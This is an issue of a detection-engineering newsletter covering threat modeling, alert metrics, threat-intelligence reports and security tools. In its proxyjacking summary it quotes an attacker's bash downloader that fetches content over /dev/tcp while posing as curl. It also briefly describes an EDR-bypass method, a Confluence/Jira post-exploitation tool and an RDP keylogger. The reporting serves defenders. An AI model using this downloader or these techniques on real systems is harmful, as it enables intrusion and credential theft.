Detection Engineering Weekly #30 - Screw your data lakes, I'm all in on data lagoons
We have fruity & boozy drinks on our threat hunts
Welcome to Issue #30 of Detection Engineering Weekly!
This week’s recap:
💎 by Simone Kraus on using threat modeling for detection ideation
Anti-cheat cheaters found process mockingjaying first, but only to stick it to Valve?
Anton Chuvakin pushes back on data lake monoliths, and joins me on the Detection Engineering Data Lagoon™
Gary Katz on building blocks on detection metrics, Craig Wright takes over your Confluence and JIRA servers, and the single best post I’ve read on ISAPI module internals by Ron Bowes
Kaspersky burns Lazarus TTPs (after having a few laughs), CISA adds 8 more KEVs, Krebs on the Dropbox/Formspring/LinkedIn hacker, and Avast posts an Akira Ransomware decrypter
Plus SO much more!
🫵 Hey you! Do you have a blog post, social link, or open-source tool you want to see in this newsletter?
Leave a comment below or email me techy@detectionengineering.net
💎 Detection Engineering Gem 💎
Holistic Threat Modeling by Simone Kraus
I am a big fan of threat modeling as an input to detection engineering. There are some things that threat modeling can do for a detection team: prioritize crown jewels, identify data sources, and choose to accept OR reject risk. Wouldn’t having this information before we start ideating on detections be nice?
Kraus calls this holistic threat modeling, where the teams involved focus on the threats, vulnerabilities, and exposure probabilities based on threat-informed defense. This is an excellent breakdown of their concept; I am using this as a reference from now on!
State of the Art
Some internal detection vectors bypass by namazso
For those who read Issue #29 of Detection Engineering Weekly last week, I linked a post about Process Mockingjaying techniques for bypassing EDRs. The TL;DR is that you can find vulnerable DLLs that have a default RWX section to place your “injected code” without switching the X bit on. After some Twitter chatter, a profile claimed to discover this technique in the anti-cheat space almost exactly 5 years ago.
Pretty brilliant post from namazso, and shows that security spreads across a ton of disciplines. Although this may be new to bypass EDRs, it was definitely not “new” to bypass anticheat programs.
Endpoint on Adrenaline : Part One by goblinloot
This was a great post by goblinloot on standing up a Security Subscription tenant in Azure/M365 with controls in place. I particularly liked how goblinloot focuses on cloud misconfigurations via CSPM, one of the four threat detection scenarios from the gem on Issue #25. Many features within Defender CSPM can help build out “known” and “unknown” lists of applications, which you can use later for threat detection.
Log Centralization: The End Is Nigh? by Anton Chuvakin
Are the days of a single monolith sink of logs over? Especially if you are in a multi-cloud environment. This complicates things if you have to adhere to some compliance frameworks or are controlling costs, according to Chuvakin. Datalakes may be an answer to some of this, but as always, the answer is “it depends”, whether that depends is your threat, budget, or compliance model.
Detection Engineering Metrics Building Blocks by Gary Katz
Great introduction on using basic statistics and machine learning applications for detection engineering. When discussing rule performance, I’ve seen that most people talk about true positives and false positives, but it turns out it’s more complicated than you think.
In statistics, there are no rewards or punishments, only consequences. So, depending on how you construct your rule and rule conditions, you may be trading off TPs for FPs, but you’ll increase overall TPs in a recall scenario. Please check this post out if you want a better idea of how this works in practice!
About False Positives in Detection Engineering by LockBoxx
Lots of discussion on the combination of statistics and detection engineering this week! LockBoxx describes the difference between the TP/FP/TN/FN phenomena of security alerts and how false positives are an essential indicator that something is working. LockBoxx also differentiates the burdens of these alerts for triage and detection teams and balancing triage and focusing on what matters (finding maliciousness) is the ideal state.
How-to: Reversing and debugging ISAPI modules by Ron Bowes
Consider reading this blog post if you were on an incident involving the MOVEit vulnerability (CVE-2023-34362)! The vulnerability resided in an ISAPI module that MoveIt used to parse specific headers before sending them to the underlying application. ISAPI filters & models are fascinating from an attacker perspective, and Bowes goes into great detail on how to reverse engineer (and hunt!) for ISAPI modules on a host.
Sowing Chaos and Reaping Rewards in Confluence and Jira by Craig Wright
Targeting company wikis is excellent tradecraft, according to red team member and Specter Ops employee Craig Wright. So, why not make it easier? AtlasReaper (linked below in the Open Source section) is a .NET application that can be used inside C2 frameworks to target Confluence and Jira servers. It’s a lightweight REST client that automates the recon of these internal Atlassian tools. It also has some cheeky post-exploitation actions to help make it easier to pivot through these environments.
SIEMplify alert tuning in Splunk by Donald Murchison
In this post, Murchison publishes their Tuning Framework for Splunk. We talk about tuning a lot in this newsletter, and I’ve seen many posts on efficacy, but it is mostly theoretical or framework-driven. It’s nice to see tools that you can instal
Detection Engineering on Social Media
Link: https://twitter.com/ellishlomo/status/1675725803521179648
Link: https://twitter.com/stvemillertime/status/1675231768310427651
Link: https://twitter.com/xnand_/status/1676336329985077249
Threat Landscape
Kaspersky crimeware report: Andariel’s mistakes and EasyRat malware by Kaspersky ICS CERT
Kaspersky burns a few TTPs by Andariel, an alleged subset of the Lazarus Group. Apparently, Andariel has a fat finger problem. After successful exploitation, the Kaspersky researchers laughed at a few misspellings of their human operator and an inability to adapt to a Portuguese locale on the victim's computer.
CISA Adds Eight Known Exploited Vulnerabilities to Catalog by CISA
D-Link (2) and Samsung Mobile (6) dominated the KEV list published by CISA last week. These are older vulnerabilities: the D-Link CVEs were seen exploited in a Mirai variant by Unit 42, but I couldn’t find much related to the Samsung phone exploits in my cursory research. Ravie Lakshmanan at The Hacker News postulated that these might be related to a Google Project Zero finding around the same time frame of the vulnerability releases.
The Trickbot/Conti Crypters: Where Are They Now? By Charlotte Hammond and Ole Villadsen
Trickbot & Conti never left - they just made new friends or are under a new moniker, according to Hammond and Villadsen at IBM Security. I love reading about Conti & Trickbot because:
They have been publicly attributed to mostly the same people.
They are super organized.
They’ve been “in the game” for going on over a decade at this point.
Allegedly, the groups disbanded after the “arrest” and dox of some members and reformed under different ransomware groups, droppers, loaders, and even stealers.
Russian Cybersecurity Executive Arrested for Alleged Role in 2012 Megahacks by Brian Krebs
It sounds like the alleged perpetrator of the Formspring, LinkedIn and Dropbox hacks 11 years ago was finally picked up by law enforcement. Nikita Kislitsin, the person named in the indictment, was picked up in Kazakhstan and used to be head of security at formerly Russian-based Group-IB. The best part? Kislitsin, according to Group-IB, now works for a Russian organization called “Fight Against Cybercrime Technologies.” You can’t make this up!
Decrypted: Akira Ransomware by Avast Threat Labs
The Akira ransomware gang, first broke by Eric Capuano (and featured in this newsletter!), has similarities to Conti, according to Avast Threat Labs. The team at Avast also published a free decryptor for Akira infections. I was hoping they would get into how they broke the decryption, and if you read towards the end, it looks like it may be a weak password, and Avast brute-forced it with their tool.
Proxyjacking: The Latest Cybercriminal Side Hustle by Allen West
West and the Akamai Security Research team caught a proxyjacking campaign in their honeypots red-handed! This isn’t the first proxyjacking post on this newsletter, but there were a few notable findings in this post. First, the initial access script had a super-interesting “curl” (yes, in quotes) implementation. To me, it seems like the point was to be platform-independent.
function __curl() {
read proto server path <<<$(echo ${1//// })
DOC=/${path// //}
HOST=${server//:*}
PORT=${server//*:}
[[ x"${HOST}" == x"${PORT}" ]] && PORT=80
exec 3<>/dev/tcp/${HOST}/$PORT
echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\nUser-Agent: curl/6.1.9\r\n\r\n" >&3
(while read line; do
[[ "$line" == $'\r' ]] && break
done && cat) <&3
exec 3>&-
}
Pretty neat, huh? Second, apparently proxyjackers, much like cryptominers, hate competitors. So, they find other proxyjacking Docker containers running on the victim host and kill them.
Open Source
threat-composer by awslabs
Take Kraus’ threat modeling post from above and use this to build “prescriptive threat articulation” statements. I quite like this because it takes the thinking out of some of the complexity in threat modeling and forces participants to describe statements in a standardized way.
ALFA by invictus-ir
Automated GCP forensic analyzer that converts Google events to MITRE ATT&CK and scores them based on a kill-chain timeline. The goal is to present the analyst with additional “sub-chains” to analyze and then build an incident timeline.
AtlasReaper by werdhaihai
Interesting red team tool (that I linked above in State of the Art) to help collect and further compromise victims on corporate Confluence and Jira servers. I’d be interested to see how some of these actions map to audit logs generated by Confluence servers.
TakeMyRDP by TheD1rkMtr
Interesting method to keylog RDP sessions. It uses SetWindowsHookEx
to check for keyboard events and filters out everything but mstic and CredentialUIBroker. I’m sure most EDRs can catch processes hooking keyboard events like this, but still interesting nonetheless!
edge by iknowjason
Edge is a cloud service provider IP attribution tool. Although it is mostly advertised as a red team/recon/bug bounty tool, it’s a great way to lookup IP addresses and attribute it to specific cloud provider services.